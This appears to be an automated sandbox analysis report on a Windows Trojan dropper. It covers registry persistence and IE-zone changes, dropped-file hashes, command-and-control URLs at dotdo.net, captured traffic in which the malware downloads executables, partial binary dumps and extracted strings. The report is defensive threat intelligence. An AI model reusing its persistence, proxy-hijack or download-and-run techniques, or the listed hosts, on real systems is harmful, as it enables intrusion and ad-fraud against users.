"cutoauto" = "C:\a\wincheckfe.exe"

"interpee" = "C:\a\internetport3.exe"

"autoauto" = "73581819.bat"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"rutoauto" = "73581819.bat"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

Dropped PE files

MD5 File path
a632e8db250976257ee2e73d658ada12 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\yuntnani\vchk.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc13.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc13.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsc13.tmp\nsExec.dll
8614c450637267afacad1645e23ba24a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse6.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nse6.tmp\System.dll
8614c450637267afacad1645e23ba24a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp8.tmp\FindProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp8.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsp8.tmp\inetc.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr10.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr10.tmp\inetc.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr10.tmp\nsExec.dll
99f345cf51b6c3c317d20a81acb11012 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvA.tmp\KillProcDLL.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvA.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsvA.tmp\inetc.dll
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nswE.tmp\System.dll
2df723b3cb50a002fca6e8c63a7a487f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\8MWF95DD\EG9650tGGrxO3Eyr78zW[1].exe
a632e8db250976257ee2e73d658ada12 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\IYXZ7PKS\vchk[1].exe
cb6a1aa1be943fd5aa85bd18708f759b c:\Program Files\FastInternet\app.exe
29ff2eda9ef60448c67860c675175072 c:\Program Files\FastInternet\dotuninstall.exe
42badc1d2f03a8b1e4875740d3d49336 c:\a\7za.exe
2df723b3cb50a002fca6e8c63a7a487f c:\a\EG9650tGGrxO3Eyr78zW.exe
b19e81fc91a71a7222e63ea4f09771af c:\a\FiddlerCore.dll
da9dbf01355305af60037cd13ccf2968 c:\a\getcap.exe
2943023b33bb769d64721d4edccbd00b c:\a\internetport3.exe
e703835506e5dab34f20b5b496a38f72 c:\a\wcheckf.exe
813d46d64e42bf222676084e12e2e80d c:\a\wincheckfe.exe
7988bca8dfaacb79579fd000a31e69cf c:\a\winonit.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 65536 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 258048 2528 2560 3.12403 3333d5ca3c163ed95562eb98d8231779

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 10
6e9a02e45ff743e1e4fadd370e2903eb
aba7046b8baa12b2f0d4c8e67c5ee5dc
870adaabb0d08155f2e2f0d0d5111c82
b8c773eb87a0e41fc08ac983d38eaae0
48423276abbd0ba36915f6c270ce2246
d433981901923cfc7761708c0a8c1bba
000b647a23034792225a3ab9da073d23
c9011de3725d8bff7315a68c4adbad5b
6f36ebfe9bcdb0e9ce78f8200cc42804
2c6ca3869994304875f192b610227269

URLs

URL IP
hxxp://dotdo.net/cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; 81.17.31.2
hxxp://dotdo.net/act/bdcount.ini?uniqueid=EG9650tGGrxO3Eyr78zW&type=1&reg=73581819.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 81.17.31.2
hxxp://dotdo.net/act/uniqueEG9650tGGrxO3Eyr78zW.ini?rd=4 81.17.31.2
hxxp://dotdo.net/act/exesbununique/EG9650tGGrxO3Eyr78zW.exe 81.17.31.2
hxxp://dotdo.net/act/exevc/vchk.exe 81.17.31.2
hxxp://dotdo.net/act/txt/hho.txt 81.17.31.2
hxxp://dotdo.net/act/txt/uur.txt 81.17.31.2
hxxp://dotdo.net/act/txt/vv.txt 81.17.31.2
hxxp://dotdo.net/act/txt/vchk.txt 81.17.31.2
hxxp://dotdo.net/ckkk.html 81.17.31.2
hxxp://dotdo.net/ckkkp.html 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/uur.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/bdcount.ini?uniqueid=EG9650tGGrxO3Eyr78zW&type=1&reg=73581819.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 81.17.31.2
hxxp://dotap.dotdo.net/act/exesbununique/EG9650tGGrxO3Eyr78zW.exe 81.17.31.2
hxxp://dotap.dotdo.net/act/exevc/vchk.exe 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vchk.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/hho.txt 81.17.31.2
hxxp://dotap.dotdo.net/act/uniqueEG9650tGGrxO3Eyr78zW.ini?rd=4 81.17.31.2
hxxp://dotap.dotdo.net/act/txt/vv.txt 81.17.31.2
fp0.dotdo.net 109.123.123.124


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content
SURICATA STREAM SHUTDOWN RST invalid ack
SURICATA STREAM Packet with invalid ack

Traffic

GET /act/txt/hho.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 4084
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
VVV.later-download.com.later-download.com.VVV.evodownload.com.evodownl
oad.com.cdn.castplatform.com.m3.zlvijp.com.zonealarm.com.VVV.zonealarm
.com.download.zonealarm.com.VVV.malwarebytes.org.malwarebytes.org.d.in
stashareonline.com.instashareonline.com.VVV.instashareonline.com.cdn.o
ptimizely.com.fp114.digitaloptout.com.VVV.superfish.com.superfish.com.
static.scanscout.com.z7hcp7lnkxu.st31g1duz2.com.ads.pubmatic.com.f-sec
ure.com.VVV.f-secure.com.gripdownload.co.d.jazzedcdn.com.VVV.gripdownl
oad.co.360safe.com.VVV.360safe.com.comodo.com.VVV.comodo.com.personalf
irewall.comodo.com.comodo-internet-security.en.softonic.com.srv.quikdi
splay.com.VVV.dimtron.com.dimtron.com.d.gettvwizard.com.d.instashareon
line.com.instashareonline.com.VVV.instashareonline.com.apiboxrockinfo-
a.akamaihd.net.b3.playfizz.com.apitechgilenet-a.akamaihd.net.d2d6i1lej
l34hs.cloudfront.net.jelly.hatonafish.com.nps.donutleads.com.app.donut
leads.com.istatic.datafastguru.info.pstatic.datafastguru.info.static.d
atafastguru.info.datafastguru.info.VVV.datafastguru.info.jsgnr.datafas
tguru.info.cdn.sharedaddomain.com.VVV.sharedaddomain.com.cdn.sharedadd
omain.com.besttv39.cdn.it.best-tv.com.nps.donutleads.com.VVV.donutlead
s.com.donutleads.com.securepaths.com.VVV.securepaths.com.upgrade-softw
are.org.VVV.upgrade-software.org.nps.pastaleads.com.pastaleads.com.www
.pastaleads.com.app.pastaleads.com.74faa29e28b0e.com.VVV.74faa29e28b0e
.com.VVV.safedownloadsrus108.com.safedownloadsrus108.com.VVV.v4downloa
d.com.v4download.com.VVV.v4download2.biz.v4download2.biz.VVV.4fbd0
<<< skipped >>>

GET /act/txt/uur.txt HTTP/1.1


User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 2093
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
kds.adspirit.de/adscript.php?pid=133&ord=[timestamp]..VVV.download.cne
t.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..download.cn
et.com/Malwarebytes-Anti-Malware/3000-8022_4-10804572.html..VVV.filehi
ppo.com/download_malwarebytes_anti_malware..filehippo.com/download_mal
warebytes_anti_malware..majorgeeks.com/files/details/malwarebytes_anti
_malware.html..VVV.majorgeeks.com/files/details/malwarebytes_anti_malw
are.html..VVV.microsoft.com/en-us/download/confirmation.aspx?id=9905..
microsoft.com/en-us/download/confirmation.aspx?id=9905..ads.pubmatic.c
om/AdServer/js/showad.js..download.cnet.com/Comodo-Internet-Security-P
remium/3000-2239_4-10460704.html..filehippo.com/download_comodo..VVV.f
ilehippo.com/download_comodo..VVV.tomsguide.com/us/download/Comodo-Ant
ivirus-Firewall-internet-security,0301-6605.html..tomsguide.com/us/dow
nload/Comodo-Antivirus-Firewall-internet-security,0301-6605.html..VVV.
pcmag.com/article2/0,2817,2457135,00.asp..pcmag.com/article2/0,2817,24
57135,00.asp..ads.pubmatic.com/AdServer/js/showad.js..b.scorecardresea
rch.com/beacon.js..d.gettvwizard.com/l/load.js..d.instashareonline.com
/l/load.js..apiboxrockinfo-a.akamaihd.net/gsrs?is=EF23DDUS&bp=PB3&g=a6
36a08d-c0be-4314-b676-974f8a821dce..VVV.filehippo.com/download_malware
bytes_anti_malware..filehippo.com/download_malwarebytes_anti_malware..
VVV.filehippo.com/download_malwarebytes_anti_malware/59476..filehippo.
com/download_malwarebytes_anti_malware/59476..origin.languages.malware
bytes.org/downloads/..download.cnet.com/Malwarebytes-Anti-Malware/
<<< skipped >>>

GET /act/txt/vv.txt HTTP/1.1


User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:26 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
5d26..all;;;;;;;;;;;<div class="mapAndAttrs">;;;;;;;;;;;<div 
class="mapAndAttrs"><iframe width="300" height="250" scrolling=n
o frameborder=0 scrolling=no allowtransparency=true src=hXXp://adss.do
tdo.net/adss/indexR.php?size=300x250 id="ddttttr"></iframe>..
all;;;;;;;;;;;<button class="reply_button js-only">;;;;;;;;;;;&l
t;br><iframe width="728" height="90" scrolling=no frameborder=0 
scrolling=no allowtransparency=true src=hXXp://adss.dotdo.net/adss/ind
exR.php?size=728x90 id="ddttttr"></iframe><br><butto
n class="reply_button js-only">..all;;;;;;;;;;;<header class="bc
head">;;;;;;;;;;;<br><iframe width="728" height="90" scrol
ling=no frameborder=0 scrolling=no allowtransparency=true src=hXXp://a
dss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></iframe&
gt;<br><header class="bchead">..all;;;;;;;;;;;<ul class
="clfooter">;;;;;;;;;;;<br><iframe width="728" height="90"
 scrolling=no frameborder=0 scrolling=no allowtransparency=true src=ht
tp://adss.dotdo.net/adss/indexR.php?size=728x90 id="ddttttr"></i
frame><br><ul class="clfooter">..kds.adspirit.de;;;;;;;
;;;;top.location.href;;;;;;;;;;;abcd..installpath.com;;;;;;;;;;;<di
v style="margin:0 auto; width:320px; height:270px;">;;;;;;;;;;;<
iframe width="850" height="480" scrolling=no frameborder=0 scrolling=n
o allowtransparency=true src=hXXp://adss.dotdo.net/adss/indexRB.php?a=
11 id="ddttttr"></iframe>..VVV.installpath.com;;;;;;;;;;;
<<< skipped >>>


GET /ckkk.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:42 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT
ETag: "1d6000000029282-91-50a497515eff0"
Accept-Ranges: bytes
Content-Length: 145
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>..</body>..</html>..HTTP/1.1 200 OK
..Date: Fri, 28 Aug 2015 06:51:42 GMT..Server: Apache/2.2.22 (Win64) P
HP/5.3.13..Last-Modified: Mon, 15 Dec 2014 23:18:16 GMT..ETag: "1d6000
000029282-91-50a497515eff0"..Accept-Ranges: bytes..Content-Length: 145
..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..Content-Type
: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitio
nal//EN">..<html>..<head>..<title>Untitled</ti
tle>..</head>..<body>..</body>..</html>..font>....



GET /act/txt/vchk.txt HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:26 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
2990..mpck_gb_26.exe.upmpck_gb_26.exe.LuckyTab.exe.MaxComputerCleaner_
Maintenance.exe.ospd_us_1080.exe.upmbot_gb_571.exe.Setup_product_26943
.exe.SwiftRecord.expext.exe.SwiftRecord.BOASHelper.exe.SwiftRecord.BOA
SPRT.exe.SwiftRecord.BOAS.exe.SwiftRecord.BrowserAdapter.exe.TriplePos
e.expext.exe.TriplePose.BOASHelper.exe.TriplePose.BOASPRT.exe.TriplePo
se.BOAS.exe.TriplePose.BrowserAdapter.exe.FragileFixer.expext.exe.Frag
ileFixer.BOASHelper.exe.FragileFixer.BOASPRT.exe.FragileFixer.BOAS.exe
.FragileFixer.BrowserAdapter.exe.SimpleforYou.expext.exe.SimpleforYou.
BOASHelper.exe.SimpleforYou.BOASPRT.exe.SimpleforYou.BOAS.exe.Simplefo
rYou.BrowserAdapter.exe.Hatchiho.expext.exe.Hatchiho.BOASHelper.exe.Ha
tchiho.BOASPRT.exe.Hatchiho.BOAS.exe.Hatchiho.BrowserAdapter.exe.Mount
ainBike.expext.exe.MountainBike.BOASHelper.exe.MountainBike.BOASPRT.ex
e.MountainBike.BOAS.exe.MountainBike.BrowserAdapter.exe.EduApp.expext.
exe.EduApp.BOASHelper.exe.EduApp.BOASPRT.exe.EduApp.BOAS.exe.EduApp.Br
owserAdapter.exe.innoApp.expext.exe.innoApp.BOASHelper.exe.innoApp.BOA
SPRT.exe.innoApp.BOAS.exe.innoApp.BrowserAdapter.exe.SpecialBox.expext
.exe.SpecialBox.BOASHelper.exe.SpecialBox.BOASPRT.exe.SpecialBox.BOAS.
exe.SpecialBox.BrowserAdapter.exe.BetweenLines.expext.exe.BetweenLines
.BOASHelper.exe.BetweenLines.BOASPRT.exe.BetweenLines.BOAS.exe.Between
Lines.BrowserAdapter.exe.EnhanceTronic.expext.exe.EnhanceTronic.BOASHe
lper.exe.EnhanceTronic.BOASPRT.exe.EnhanceTronic.BOAS.exe.EnhanceTroni
c.BrowserAdapter.exe.MetalMaker.expext.exe.MetalMaker.BOASHelper.e
<<< skipped >>>


GET /cki.php?a=aa&pp=http=127.0.0.1:8877;https=127.0.0.1:8877; HTTP/1.1
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:22 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 11
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...googgoodHTTP/1.1 200 OK..Date: Fri, 28 Aug 2015 06:51:22 GMT..Serve
r: Apache/2.2.22 (Win64) PHP/5.3.13..X-Powered-By: PHP/5.3.13..Content
-Length: 11..Keep-Alive: timeout=5, max=100..Connection: Keep-Alive..C
ontent-Type: text/html.....googgood..



GET /act/bdcount.ini?uniqueid=EG9650tGGrxO3Eyr78zW&type=1®=73581819.bat&prama=&pramb=&pramc=&system=XP?v=5&rd=4 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:24 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
[a]..v=6....


GET /act/uniqueEG9650tGGrxO3Eyr78zW.ini?rd=4 HTTP/1.1


User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:24 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html
[a]..v=yes....


GET /act/exesbununique/EG9650tGGrxO3Eyr78zW.exe HTTP/1.1


User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:24 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Tue, 26 May 2015 16:50:52 GMT
ETag: "100000000026a66-dfa3-516feede835a3;509b7b7bbf620"
Accept-Ranges: bytes
Content-Length: 57251
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>


GET /ckkkp.html HTTP/1.0
User-Agent: tota
Host: dotdo.net
Connection: Keep-Alive
Pragma: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:49 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Sat, 29 Nov 2014 11:40:35 GMT
ETag: "100000000026c77-9f-508fdd8811aa8"
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">.
.<html>..<head>..<title>Untitled</title>..<
/head>..<body>....<mamoba>..</body>..</html>
;..HTTP/1.1 200 OK..Date: Fri, 28 Aug 2015 06:51:49 GMT..Server: Apach
e/2.2.22 (Win64) PHP/5.3.13..Last-Modified: Sat, 29 Nov 2014 11:40:35 
GMT..ETag: "100000000026c77-9f-508fdd8811aa8"..Accept-Ranges: bytes..C
ontent-Length: 159..Keep-Alive: timeout=5, max=100..Connection: Keep-A
live..Content-Type: text/html..<!DOCTYPE HTML PUBLIC "-//W3C//DTD H
TML 4.01 Transitional//EN">..<html>..<head>..<title&
gt;Untitled</title>..</head>..<body>....<mamoba&g
t;..</body>..</html>....



GET /act/exevc/vchk.exe HTTP/1.1
User-Agent: tota
Host: dotap.dotdo.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 28 Aug 2015 06:51:25 GMT
Server: Apache/2.2.22 (Win64) PHP/5.3.13
Last-Modified: Wed, 19 Aug 2015 17:31:58 GMT
ETag: "16a000000026349-ddb0-51dad696a4296"
Accept-Ranges: bytes
Content-Length: 56752
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
.................................................................t....
......................................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...............z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

wincheckfe.exe_1676:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp\FindProcDLL.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp\FindProcDLL.dll
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp\FindProcDLL.dll
.reloc
Kernel32.DLL
PSAPI.DLL
FindProcDLL.dll
System.dll
callback%d
g.ZO||k[
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse6.tmp
nse6.tmp
C:\a\wincheckfe.exe
wincheckfe.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse5.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

EG9650tGGrxO3Eyr78zW.exe_1932:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
OCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp\inetc.dll
cation Data\apEG9650tGGrxO3Eyr78zW.html
rome.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp\inetc.dll
Override:<-loopback> || AutoConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp
.reloc
SShL0
PeekNamedPipe
CreatePipe
nsExec.dll
99|9
: :0:5:>:
u.Uj@
MSVCRT.dll
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
9!9-9B9}9
g.ZO||k[
%Documents and Settings%\%current user%\Local Settings\Application Data\apEG9650tGGrxO3Eyr78zW.html
A~loogg2.txt
rxO3Eyr78zW.html
PEG96~1.HTM
UME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp\inetc.dll
ml/fide/lo2EG9650tGGrxO3Eyr78zW.txt
ConfigURL: ||| ||| 6.0.2900.5512 ||ProxySettingsPerUser: 1 || ProxyEnable: 1 || ProxyEnableLM: 1
\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsc13.tmp
1464376
vchk.exe
r78zW.exe
1495040
C:\a\EG9650tGGrxO3Eyr78zW.exe
EG9650tGGrxO3Eyr78zW.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsp4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
http=127.0.0.1:8877;https=127.0.0.1:8877
C:\a\internetport3.exe
6.0.2900.5512
73581819.bat
.exe" -n vmusr
getcap.exe
winonit.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
ttps=127.0.0.1:8877
tport3.exe
9.bat
port3.exe
Tools\vmtoolsd.exe" -n vmusr

EG9650tGGrxO3Eyr78zW.exe_1932_rwx_10004000_00001000:

callback%d

wcheckf.exe_660:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
